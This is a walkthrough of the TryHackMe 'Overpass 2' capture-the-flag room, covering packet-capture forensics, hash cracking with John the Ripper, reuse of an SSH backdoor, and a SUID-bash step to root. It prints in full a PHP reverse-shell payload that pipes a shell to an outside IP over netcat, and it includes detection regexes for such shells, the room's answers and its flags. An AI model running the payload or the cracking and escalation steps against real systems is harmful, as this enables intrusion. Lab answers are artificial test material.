TryHackMe: Overpass 2

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. Can you work out how the attacker got in, and hack your way back into Overpass' production server?

Information

Room: Overpass 2
Difficulty: Easy
Files: overpass2.pcapng (3.7 MB)
Environment: Remnux Virtual Machine

My Recommendations

This is my personal preference: I like being organized and deleting a folder when I’m done with it.

mkdir Documents/TryHackMe/Overpass && cd Documents/TryHackMe/Overpass

Download it from the room, and then verify the file hash:

md5sum overpass2.pcapng

MD5 hash: 11c3b2e9221865580295bc662c35c6dc

Walkthrough

Task 1: Forensics - Analyse the PCAP

1. What was the URL of the page they used to upload a reverse shell?

Opening the file in Wireshark and filtering the packets with ‘http‘ shows the requests the attacker made.

A file named ‘upload.php’ was uploaded to /development/. We can check whether it’s a reverse shell by selecting File -> Export Objects -> HTTP, saving the file to our VM and printing its contents:

cat upload.php

It’s indeed a php reverse shell!

Answer: /development/

2. What payload did the attacker use to gain access?

The payload used is the one in the file upload.php.

Answer: <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
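The manual steps of questions 1 and 2 (find the upload request, export the object, read the file and judge whether it is a reverse shell) can be turned into a small classifier. The script below is an added example written for this walkthrough, not code from the room or the blog: it parses a constructed multipart POST (the path, file name and PHP payload are the ones above; the host, boundary and form field name are made up), pulls out the uploaded file, and flags the reverse-shell building blocks together with the callback address a defender would want as an indicator.

```python
import re

# Constructed sample of a multipart file upload as it appears in a followed TCP stream.
# The request path, file name and PHP payload are the ones the page names; the host,
# boundary and form field name (fileToUpload) are made up for the example.
SAMPLE_UPLOAD = (
    "POST /development/upload.php HTTP/1.1\r\n"
    "Host: overpass.thm\r\n"
    "Content-Type: multipart/form-data; boundary=----Boundary1234\r\n"
    "\r\n"
    "------Boundary1234\r\n"
    'Content-Disposition: form-data; name="fileToUpload"; filename="upload.php"\r\n'
    "Content-Type: application/x-php\r\n"
    "\r\n"
    '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>\r\n'
    "------Boundary1234--\r\n"
)

# A harmless upload of the same shape, so the classifier's negative case is visible too.
BENIGN_UPLOAD = (
    "POST /development/upload.php HTTP/1.1\r\n"
    "Host: overpass.thm\r\n"
    "Content-Type: multipart/form-data; boundary=----Boundary1234\r\n"
    "\r\n"
    "------Boundary1234\r\n"
    'Content-Disposition: form-data; name="fileToUpload"; filename="notes.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "Remember to rotate the backup keys on Friday.\r\n"
    "------Boundary1234--\r\n"
)

# Patterns that, in combination, make an uploaded file look like the mkfifo/nc reverse
# shell from the capture. One hit alone is only suspicious; two or more is a strong signal.
INDICATORS = {
    "php_exec": re.compile(r"<\?php\s+(?:exec|system|shell_exec|passthru|popen)\s*\("),
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i"),
    "netcat_connect": re.compile(r"\bnc(?:at)?\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d+"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
}
CALLBACK = re.compile(r"\bnc(?:at)?\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)")


def parse_upload(stream: str) -> dict:
    """Split one HTTP request into request line, headers and body, then pull the
    uploaded file's name and content out of the multipart body."""
    head, _, body = stream.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, path, _version = request_line.split(" ", 2)
    name_match = re.search(r'filename="([^"]*)"', body)
    filename = name_match.group(1) if name_match else None
    content = None
    if filename is not None:
        # The part's own headers end at a blank line; the content runs up to the next boundary.
        _, _, rest = body.partition("\r\n\r\n")
        content = rest.split("\r\n--", 1)[0]
    return {"method": method, "path": path, "filename": filename, "content": content}


def analyse_upload(stream: str) -> dict:
    """Classify an upload the way an analyst does by hand after Export Objects -> HTTP:
    look for reverse-shell building blocks and, if present, record the callback address."""
    info = parse_upload(stream)
    content = info["content"] or ""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    cb = CALLBACK.search(content)
    info["indicators"] = hits
    info["callback"] = (cb.group(1), int(cb.group(2))) if cb else None
    info["verdict"] = "reverse-shell" if len(hits) >= 2 else "suspicious" if hits else "clean"
    return info


if __name__ == "__main__":
    for sample in (SAMPLE_UPLOAD, BENIGN_UPLOAD):
        r = analyse_upload(sample)
        print(f"{r['path']} {r['filename']}: {r['verdict']} {r['indicators']} callback={r['callback']}")
```

The same indicator set works on files exported from Wireshark: read each exported object, run it through the regexes, and anything with two or more hits is worth a closer look. The callback tuple (192.168.170.145, 4242 here) is the first thing to pivot on in the rest of the capture.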

3. What password did the attacker use to privesc?

The easy, lazy way is to run strings on the pcapng file and grep for ‘pass’, printing a few lines of context after each match:

strings overpass2.pcapng | grep pass -A 5

There are many matches, but ultimately the password whenevernoteartinstant was used for privilege escalation.

In the PCAP, we can look into the TCP streams (Analyze -> Follow -> TCP Stream). TCP stream 1 contains the packets of the initial attack, i.e. when the reverse shell was uploaded. TCP stream 2 contains the packets relating to the reverse shell being ‘activated‘. TCP stream 3 is very juicy: it contains the attacker’s commands, including the password they typed to escalate privileges.

After entering this password, the attacker was logged in as james.

Answer: whenevernoteartinstant

4. How did the attacker establish persistence?

In the same TCP stream (stream 3), the attacker downloaded the GitHub repository ‘ssh-backdoor’, generated an SSH key, and then executed the backdoor with a hash as its argument.

5. Using the fasttrack wordlist, how many of the system passwords were crackable?

Before downloading ssh-backdoor, the attacker printed the contents of /etc/shadow, the file that holds the users’ hashed passwords. Only five users have hashes:

We can save the hashes in a text file and crack them with John the Ripper:

# '#hashes' stands for the five user:hash lines copied from the shadow output
echo -n '#hashes' > hashes
john --wordlist=fasttrack.txt hashes

John managed to crack four out of five hashes with the fasttrack wordlist:

Answer: 4
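Deciding which shadow entries are worth feeding to john is a parsing job: the second field is either a crypt(3) hash with an `$id$` prefix, a lock marker (`*`, `!`, `!!`), or empty. The script below is an added example for this walkthrough, not part of the blog or the room: it parses a constructed shadow excerpt (the user names james and paradox are from the room, but the hash strings are placeholders of the right shape, not the captured hashes), names each hash scheme, and produces the user:hash lines john reads directly.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed /etc/shadow excerpt in the real file's 9-field layout. Salts and digests
# are placeholders; only the names james and paradox come from the room.
SAMPLE_SHADOW = """\
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
sshd:*:18295:0:99999:7:::
james:$6$Y2ZmYmNk$PLACEHOLDERsha512cryptDigestAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:18297:0:99999:7:::
paradox:$6$ZGVmZ2hp$PLACEHOLDERsha512cryptDigestBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB:18297:0:99999:7:::
legacy:$1$Abcdefgh$PLACEHOLDERmd5cryptDigest0:17000:0:99999:7:::
locked:!$6$c2FsdHNh$PLACEHOLDERsha512cryptDigestCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:18297:0:99999:7:::
nobody:!:18295:0:99999:7:::
"""

# $id$ prefixes defined for crypt(3); descrypt has no prefix at all.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt",
             "y": "yescrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt"}


@dataclass
class ShadowEntry:
    user: str
    hash_field: str
    last_change: Optional[int]  # days since the epoch, empty in some entries


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow lines; every line must have exactly nine colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(fields)}")
        last_change = int(fields[2]) if fields[2] else None
        entries.append(ShadowEntry(fields[0], fields[1], last_change))
    return entries


def hash_scheme(field: str) -> Optional[str]:
    """Name the crypt(3) scheme behind a password field, or None when there is nothing
    to crack: '*', '!' and '!!' mean no valid password, a leading '!' marks an account
    locked with passwd -l, and an empty field means no password at all."""
    if field == "" or field.startswith(("*", "!")):
        return None
    m = re.match(r"\$([^$]+)\$", field)
    if m:
        return CRYPT_IDS.get(m.group(1), f"unknown(${m.group(1)}$)")
    return "descrypt"  # legacy 13-character DES hash without an $id$ prefix


def crackable_accounts(text: str) -> List[Tuple[str, str]]:
    """Users whose field holds a real hash, with the scheme john will have to run."""
    return [(e.user, hash_scheme(e.hash_field))
            for e in parse_shadow(text) if hash_scheme(e.hash_field)]


def john_input(text: str) -> str:
    """user:hash lines, the form john accepts directly as its input file."""
    return "\n".join(f"{e.user}:{e.hash_field}"
                     for e in parse_shadow(text) if hash_scheme(e.hash_field))


if __name__ == "__main__":
    for user, scheme in crackable_accounts(SAMPLE_SHADOW):
        print(f"{user}: {scheme}")
```

Note the `locked` entry: an account locked with passwd -l keeps its hash behind the `!`, so a thorough audit would strip the `!` and crack it too, since the same password may be reused elsewhere. The scheme names matter because sha512crypt runs thousands of rounds per guess, which is why fasttrack (a small list) finishes quickly while rockyou would take far longer.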

Task 2: Research - Analyse the code

1. What's the default hash for the backdoor?

For this challenge, I installed and built ssh-backdoor. After building it, we can read the default value from the help output:

./backdoor -h

Answer: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

2. What's the hardcoded salt for the backdoor?

Looking at ‘main.go’ of the ssh-backdoor repository:

cat main.go

The last function, passwordHandler, verifies the password against the hardcoded salt:

Answer: 1c362db832f3f864c8c2fe05f2002a05

3. What was the hash that the attacker used?

In the TCP stream, it was shown that the attacker used the following command:

./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Answer: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

4. Crack the hash using rockyou and a cracking tool of your choice. What's the password?

First, save the hash and the salt to a file in the form hash$salt. The hash is 128 hex characters long, which is the standard length of a SHA-512 digest. To crack it, we need to tell john the format ‘dynamic=sha512($p.$s)‘ (SHA-512 over the password followed by the salt); this dynamic format is only available in John the Ripper Jumbo.

echo -n '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05' > ssh.hash
john --format='dynamic=sha512($p.$s)' --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash

Answer: november16
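To see what the ‘sha512($p.$s)‘ format actually computes, and to check the answers to questions 2, 3 and 4 against each other, here is an added example for this walkthrough: my own Python reimplementation of the scheme, not the backdoor's main.go. It uses the salt and the attacker's hash from above, recomputes the digest for the cracked password, and shows why a compile-time salt makes every installation of this backdoor share one rainbow table. The mini wordlist is constructed; rockyou.txt is what the page really uses.

```python
import hashlib
import hmac

# Values from the page: the salt hardcoded in main.go and the hash the attacker
# passed to ./backdoor -a in TCP stream 3.
SALT = "1c362db832f3f864c8c2fe05f2002a05"
ATTACKER_HASH = ("6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
                 "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed")

# Constructed mini wordlist standing in for rockyou.txt.
CONSTRUCTED_WORDLIST = ["123456", "letmein", "summer2020", "november16", "qwerty"]


def hash_password(password: str, salt: str = SALT) -> str:
    """hex(SHA-512(password || salt)): the construction john's 'dynamic=sha512($p.$s)'
    format names. Reimplemented here for the example, not copied from the backdoor."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify_password(candidate: str, stored_hash: str, salt: str = SALT) -> bool:
    """Constant-time comparison, so a verifier does not leak how many leading hex
    digits of the digest matched."""
    return hmac.compare_digest(hash_password(candidate, salt), stored_hash)


def first_match(stored_hash: str, wordlist, salt: str = SALT):
    """What john does with the wordlist, reduced to its essentials: hash each candidate
    with the fixed salt and stop at the first one that reproduces the stored digest."""
    for word in wordlist:
        if hash_password(word, salt) == stored_hash:
            return word
    return None


def fixed_salt_is_shared(password: str) -> bool:
    """Because the salt is a constant in the source, the same password gives the same
    digest on every host running this backdoor, so one cracked hash (or a precomputed
    table) transfers everywhere. A per-installation random salt (constructed value
    below) would make the digests differ even for the same password."""
    per_host_salt = "9f1d3c5ab2e4470d8c6b5a1e0f2d3c4b"  # constructed, stands in for os.urandom(16).hex()
    same_everywhere = hash_password(password) == hash_password(password, SALT)
    differs_with_own_salt = hash_password(password, per_host_salt) != hash_password(password)
    return same_everywhere and differs_with_own_salt


if __name__ == "__main__":
    print("recomputed matches attacker hash:", verify_password("november16", ATTACKER_HASH))
    print("wordlist hit:", first_match(ATTACKER_HASH, CONSTRUCTED_WORDLIST))
    print("fixed salt shared across hosts:", fixed_salt_is_shared("november16"))
```

hashcat users get the same result with mode 1710 (sha512($pass.$salt)) and a hash:salt input line; the order of concatenation is the only thing that has to match the source.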

Task 3: Attack - Get back in!

1. The attacker defaced the website. What message did they leave as a heading?

Filtering the pcap in Wireshark with ‘http‘ again: packets 1-27 are part of the initial exploit, while packets 3562-3619 look very suspicious. We can dump the files using File -> Export Objects -> HTTP and save both cooctus.png and index.html, then render the HTML as text:

html2text index.html

Answer: H4ck3d by CooctusClan

2. Using the information you've found previously, hack your way back in!

Since we have cracked the backdoor password, we can SSH into the machine as james on port 2222, the port the attacker’s backdoor answers on:

ssh james@10.10.218.108 -p 2222
# password: november16
ls -la

We are logged in as James!

3. What's the user flag?

In James’ home directory there is a file named ‘user.txt’:

ls -la ../
cat user.txt

Answer: thm{d119b4fa8c497ddb0525f7ad200e6567}

4. What's the root flag?

Still in James’ home directory, there is a hidden file named .suid_bash: a copy of bash owned by root with the SUID bit set. Running it with -p keeps the effective root privileges instead of dropping them, which gives us a root shell to read the flag:

./.suid_bash -p
cat /root/root.txt

Answer: thm{d53b2684f169360bb9606c333873144d}

TLDR

– This is a good Blue/Red team combo challenge: Wireshark and john for analysis and credential recovery.
– Look into the source code to understand the mechanics of the attack.
– Use SSH with the credentials found in the pcap to find the flags.
